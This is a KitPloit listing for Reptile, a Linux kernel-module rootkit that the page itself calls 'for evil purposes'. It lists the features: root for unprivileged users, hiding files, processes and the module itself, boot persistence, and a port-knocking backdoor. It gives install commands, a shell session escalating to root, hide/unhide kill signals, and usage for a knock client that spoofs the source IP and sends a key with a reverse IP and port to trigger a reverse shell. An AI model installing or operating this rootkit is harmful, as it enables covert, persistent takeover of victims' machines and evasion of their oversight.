Reptile - LKM Linux Rootkit

ID KITPLOIT:3916133356306042352
Type kitploit
Reporter KitPloit
Modified 2017-10-30T15:36:18


Reptile is a LKM rootkit for evil purposes. If you are searching stuff only for study purposes, see the demonstration codes .


  • Give root to unprivileged users
  • Hide files and directories
  • Hide files contents
  • Hide processes
  • Hide himself
  • Boot persistence
  • Heaven's door - A ICMP/UDP port-knocking backdoor
  • Client to knock on heaven's door :D


apt-get install linux-headers-$(uname -r)
cd Reptile
./ install

Binaries will be copied to /reptile folder, that will be hidden by Reptile.

Getting root privileges

[email protected]:~$ id
uid=1000(hax) gid=1000(hax) grupos=1000(hax),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth),118(scanner)
[email protected]:~$ /reptile/r00t
You got super powers!

[email protected]:/home/hax# id
uid=0(root) gid=0(root) groups=0(root)


  • Hide/unhide reptile module: kill -50 0
  • Hide/unhide process: kill -49 <PID>
  • Hide files contents: all content between the tags will be hidden Example:


    content to hide


Knocking on heaven's door
Heaven's door is a ICMP/UDP port-knocking backdoor used by Reptile. To access the backdoor you can use the client:

Knock [Knock](&lt;;) on Heaven's Door
Writen by: F0rb1dd3n

Usage: ./knock_on_heaven &lt;args&gt;

-x      protocol (ICMP/UDP)
-s      Source IP address (You can spoof)
-t      Target IP address
-p      Source Port
-q      Target Port
-d      Data to knock on backdoor: "&lt;key&gt; &lt;reverse IP&gt; &lt;reverse Port&gt;"
-l      Launch listener

[!] ICMP doesn't need ports

ICMP: ./knock_on_heaven -x icmp -s -t -d "F0rb1dd3n 4444" -l
UDP:  ./knock_on_heaven -x udp  -s -t -p 53 -q 53 -d "F0rb1dd3n 4444" -l

Some functions of this module is based on another rootkits. Please see the references!


Download Reptile